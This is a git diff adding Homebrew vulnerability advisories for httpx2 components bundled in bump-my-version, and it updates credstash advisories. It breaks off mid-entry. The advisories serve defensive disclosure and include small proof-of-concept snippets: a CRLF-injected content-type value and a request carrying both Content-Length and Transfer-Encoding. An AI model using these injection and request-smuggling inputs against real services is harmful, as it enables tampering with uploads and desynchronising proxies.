b/advisories/BREW-bump-my-version-CVE-2026-84378.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bump-my-version-CVE-2026-84378", + "published": "2026-09-10T18:58:22Z", + "modified": "2026-09-10T18:58:22Z", + "upstream": [ + "GHSA-f2fp-rgf2-35cp", + "CVE-2026-84378", + "PYSEC-2026-3847" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bump-my-version", + "purl": "pkg:brew/bump-my-version" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.5.0" + }, + { + "fixed": "1.5.1_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Quadratic SSE line buffering can cause CPU denial of service", + "details": "### Summary\n\nHTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.\n\n### Details\n\nBefore version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.\n\nThe behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.\n\n### Impact\n\nApplications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.\n\n### Mitigation\n\nUpgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.\n\nIf upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-f2fp-rgf2-35cp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84378" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1071" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1117" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/cbfc0e04ef6507da29ccbb3b9c2e5b23dd693414" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-bump-my-version-CVE-2026-84379.json b/advisories/BREW-bump-my-version-CVE-2026-84379.json new file mode 100644 index 00000000000..2bd0eb62ce9 --- /dev/null +++ b/advisories/BREW-bump-my-version-CVE-2026-84379.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bump-my-version-CVE-2026-84379", + "published": "2026-09-10T18:58:22Z", + "modified": "2026-09-10T18:58:22Z", + "upstream": [ + "GHSA-h4x7-gw46-3wm6", + "CVE-2026-84379", + "PYSEC-2026-3848" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bump-my-version", + "purl": "pkg:brew/bump-my-version" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.5.1_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Multipart part header injection via unvalidated file Content-Type and custom headers", + "details": "### Summary\n\nHTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.\n\n### Details\n\nThe three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"https://example.com/upload\",\n headers={\"Content-Type\": \"multipart/form-data; boundary=BOUNDARY\"},\n files={\n \"file\": (\n \"safe.txt\",\n b\"payload\",\n \"text/plain\\r\\nX-Injected: true\",\n )\n },\n)\n\nprint(request.read().decode())\n```\n\nThe generated body contains an attacker-injected part header:\n\n```text\n--BOUNDARY\nContent-Disposition: form-data; name=\"file\"; filename=\"safe.txt\"\nContent-Type: text/plain\nX-Injected: true\n\npayload\n--BOUNDARY--\n```\n\nThe same issue affects names and values in the custom header mapping from the four-element tuple.\n\nField names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.\n\n### Impact\n\nApplications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.\n\nThis does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.\n\nIf upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-h4x7-gw46-3wm6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84379" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1142" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/de96d810ee4e309d118982fe7084a46a2bcd600d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-bump-my-version-CVE-2026-84380.json b/advisories/BREW-bump-my-version-CVE-2026-84380.json new file mode 100644 index 00000000000..73efd65c38b --- /dev/null +++ b/advisories/BREW-bump-my-version-CVE-2026-84380.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bump-my-version-CVE-2026-84380", + "published": "2026-09-10T18:58:22Z", + "modified": "2026-09-10T18:58:22Z", + "upstream": [ + "GHSA-pf96-p4fj-6566", + "CVE-2026-84380", + "PYSEC-2026-3849" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bump-my-version", + "purl": "pkg:brew/bump-my-version" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.5.1_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Conflicting Content-Length and Transfer-Encoding headers can be auto-generated", + "details": "### Summary\n\nHTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.\n\n### Details\n\nWhen a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"http://example.com/\",\n headers={\"Transfer-Encoding\": \"chunked\"},\n content=b\"test 123\",\n)\n\nprint(request.headers)\n```\n\nThe request contains both:\n\n```text\nTransfer-Encoding: chunked\nContent-Length: 8\n```\n\nOn an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.\n\nStreaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.\n\n### Impact\n\nAn attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.\n\nDepending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.\n\nIf upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-pf96-p4fj-6566" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84380" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1137" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/829b93a2393212996f613e635261f777d9ec6eab" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-bump-my-version-CVE-2026-84381.json b/advisories/BREW-bump-my-version-CVE-2026-84381.json new file mode 100644 index 00000000000..2fb298eeb7e --- /dev/null +++ b/advisories/BREW-bump-my-version-CVE-2026-84381.json @@ -0,0 +1,98 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bump-my-version-CVE-2026-84381", + "published": "2026-09-10T18:58:21Z", + "modified": "2026-09-10T18:58:21Z", + "upstream": [ + "GHSA-7mj9-2mp8-4m2p", + "CVE-2026-84381", + "PYSEC-2026-3844", + "PYSEC-2026-3845" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bump-my-version", + "purl": "pkg:brew/bump-my-version" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.5.1_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpcore2", + "resource_purl": "pkg:pypi/httpcore2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpcore2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpcore2@2.12.0", + "resource": "httpcore2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Secure WebSocket traffic sent without TLS through SOCKS proxies", + "details": "### Summary\n\nhttpcore2 does not start TLS for `wss://` connections routed through a SOCKS5 proxy. The WebSocket opening handshake and all subsequent frames are sent in plaintext through the proxy path, despite the caller selecting the secure `wss` scheme.\n\nThe transport flaw affects httpcore2 releases before `2.10.0`. HTTPX2 exposed this behavior through its public `Client.websocket()` and `AsyncClient.websocket()` APIs from `2.6.0` through `2.9.1`.\n\n### Details\n\nThe synchronous and asynchronous SOCKS5 connection implementations upgrade the established proxy tunnel to TLS only when the remote origin scheme is `https`. The equivalent check does not include `wss`. After the SOCKS5 handshake succeeds, the raw stream is therefore passed directly to the HTTP/1.1 connection, which writes the WebSocket upgrade request without first performing a TLS handshake or verifying the destination certificate.\n\nFor example, an application using HTTPX2 `2.6.0` through `2.9.1` may open an authenticated WebSocket through a SOCKS proxy:\n\n```python\nimport httpx2\n\nwith httpx2.Client(proxy=\"socks5://proxy.example:1080\") as client:\n with client.websocket(\n \"wss://service.example/private?token=query-secret\",\n headers={\"Authorization\": \"Bearer header-secret\"},\n cookies={\"session\": \"cookie-secret\"},\n ) as websocket:\n websocket.send_text(\"private message\")\n```\n\nOn affected versions, the stream passing through the SOCKS proxy begins with a plaintext request such as:\n\n```text\nGET /private?token=query-secret HTTP/1.1\nHost: service.example\nAuthorization: Bearer header-secret\nCookie: session=cookie-secret\n```\n\nBefore HTTPX2 `2.6.0`, the same underlying httpcore2 behavior could be reached by integrations constructing a WebSocket upgrade request through the low-level transport API, but HTTPX2 did not yet provide its native WebSocket client API.\n\nA normal secure WebSocket server will usually reject these plaintext bytes because it expects a TLS ClientHello. However, a malicious or compromised SOCKS proxy can accept the SOCKS connection, observe the plaintext handshake, return a forged `101 Switching Protocols` response, and then read or modify WebSocket frames in both directions. An observer between the proxy and destination may also read the plaintext traffic.\n\nRFC 6455 requires a client using a secure WebSocket connection to perform the TLS handshake before sending the WebSocket opening handshake. A `wss` URI promises confidentiality, integrity, and endpoint authentication through TLS.\n\n### Impact\n\nAn attacker able to control or observe the SOCKS proxy path can obtain URL query parameters, authorization headers, cookies, and application messages that the caller expected TLS to protect. Because no TLS handshake occurs, certificate verification also does not occur, allowing an attacker controlling the proxy to impersonate the WebSocket server and inject or alter messages.\n\nOnly `wss://` connections routed through a SOCKS5 proxy are affected. Direct `wss://` connections and ordinary `https://` requests through SOCKS already start TLS correctly.\n\n### Mitigation\n\nUpgrade HTTPX2 and httpcore2 to `2.10.0` or later. Patched versions start TLS for both `https` and `wss` origins in the synchronous and asynchronous SOCKS5 connection paths.\n\nIf upgrading is not immediately possible, do not route `wss://` connections through a SOCKS proxy. Use a direct secure WebSocket connection or another transport that performs and verifies TLS to the WebSocket origin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-7mj9-2mp8-4m2p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84381" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1104" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/fb008dd700b761d955210d9692475c3e2f379453" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-bump-my-version-CVE-2026-84382.json b/advisories/BREW-bump-my-version-CVE-2026-84382.json new file mode 100644 index 00000000000..773b691f933 --- /dev/null +++ b/advisories/BREW-bump-my-version-CVE-2026-84382.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bump-my-version-CVE-2026-84382", + "published": "2026-09-10T18:58:21Z", + "modified": "2026-09-10T18:58:21Z", + "upstream": [ + "GHSA-8xx6-hgc6-gc2m", + "CVE-2026-84382", + "PYSEC-2026-3846" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bump-my-version", + "purl": "pkg:brew/bump-my-version" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.5.1_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.12.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Streaming response decompression does not bound peak memory (decompression amplification)", + "details": "### Summary\n\nWhen decoding a compressed response body (`gzip`, `deflate`, `br`, or `zstd`), HTTPX2 fully decompressed each network read before yielding content to the application. A small compressed input could therefore cause a large intermediate memory allocation, even when the application streamed the response to keep memory usage bounded.\n\n### Details\n\nHTTPX2's default transport reads the socket in pieces of up to 64 KiB. Before `2.12.0`, each piece was inflated completely into one intermediate allocation before any decompressed bytes were yielded.\n\nAt DEFLATE's maximum compression ratio of roughly 1032:1, a 64 KiB compressed chunk can expand to about 64 MiB in one allocation. Brotli and Zstandard responses can cause similarly large amplification. Streaming the response did not prevent these transient allocations.\n\n### Impact\n\nApplications that fetch resources from untrusted or attacker-influenced servers - such as webhook receivers, link unfurlers, crawlers, SSRF-reachable fetchers, and redirect followers - can experience memory pressure or out-of-memory termination when processing a malicious compressed response. No authentication or user interaction is required beyond issuing a request to the server.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.12.0` or later. Patched versions decompress responses incrementally with bounded intermediate buffers, including responses with multiple content encodings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-8xx6-hgc6-gc2m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84382" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1126" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/4fd0c70a3f207c618b145934792f791bccfb39f8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.12.0" + } + ] +} diff --git a/advisories/BREW-credstash-CVE-2016-9015.json b/advisories/BREW-credstash-CVE-2016-9015.json index f00e819f741..75d92fedad0 100644 --- a/advisories/BREW-credstash-CVE-2016-9015.json +++ b/advisories/BREW-credstash-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2016-9015", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2018-20060.json b/advisories/BREW-credstash-CVE-2018-20060.json index 2951c1224e2..b542aae89ef 100644 --- a/advisories/BREW-credstash-CVE-2018-20060.json +++ b/advisories/BREW-credstash-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2018-20060", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2018-25091.json b/advisories/BREW-credstash-CVE-2018-25091.json index 9466ac3fe3b..a2150145d62 100644 --- a/advisories/BREW-credstash-CVE-2018-25091.json +++ b/advisories/BREW-credstash-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2018-25091", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2019-11236.json b/advisories/BREW-credstash-CVE-2019-11236.json index 07d1bcf14d5..2739f538cce 100644 --- a/advisories/BREW-credstash-CVE-2019-11236.json +++ b/advisories/BREW-credstash-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2019-11236", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2019-11324.json b/advisories/BREW-credstash-CVE-2019-11324.json index 36875187b77..d993cab4d2d 100644 --- a/advisories/BREW-credstash-CVE-2019-11324.json +++ b/advisories/BREW-credstash-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2019-11324", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2020-26137.json b/advisories/BREW-credstash-CVE-2020-26137.json index 7b53e19b9c1..f790d856ac0 100644 --- a/advisories/BREW-credstash-CVE-2020-26137.json +++ b/advisories/BREW-credstash-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2020-26137", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2020-7212.json b/advisories/BREW-credstash-CVE-2020-7212.json index 72017723ede..2af6cb5ab0c 100644 --- a/advisories/BREW-credstash-CVE-2020-7212.json +++ b/advisories/BREW-credstash-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2020-7212", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2021-28363.json b/advisories/BREW-credstash-CVE-2021-28363.json index 9858337f966..0bab9258944 100644 --- a/advisories/BREW-credstash-CVE-2021-28363.json +++ b/advisories/BREW-credstash-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2021-28363", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2021-33503.json b/advisories/BREW-credstash-CVE-2021-33503.json index 42643130f57..bbbb3a9be09 100644 --- a/advisories/BREW-credstash-CVE-2021-33503.json +++ b/advisories/BREW-credstash-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2021-33503", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2023-43804.json b/advisories/BREW-credstash-CVE-2023-43804.json index a71d7d2a510..1baec242997 100644 --- a/advisories/BREW-credstash-CVE-2023-43804.json +++ b/advisories/BREW-credstash-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2023-43804", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2023-45803.json b/advisories/BREW-credstash-CVE-2023-45803.json index 1adef795584..7d0ddda3ed9 100644 --- a/advisories/BREW-credstash-CVE-2023-45803.json +++ b/advisories/BREW-credstash-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2023-45803", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2024-37891.json b/advisories/BREW-credstash-CVE-2024-37891.json index 30bcd2d5a65..49754c32a32 100644 --- a/advisories/BREW-credstash-CVE-2024-37891.json +++ b/advisories/BREW-credstash-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2024-37891", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - 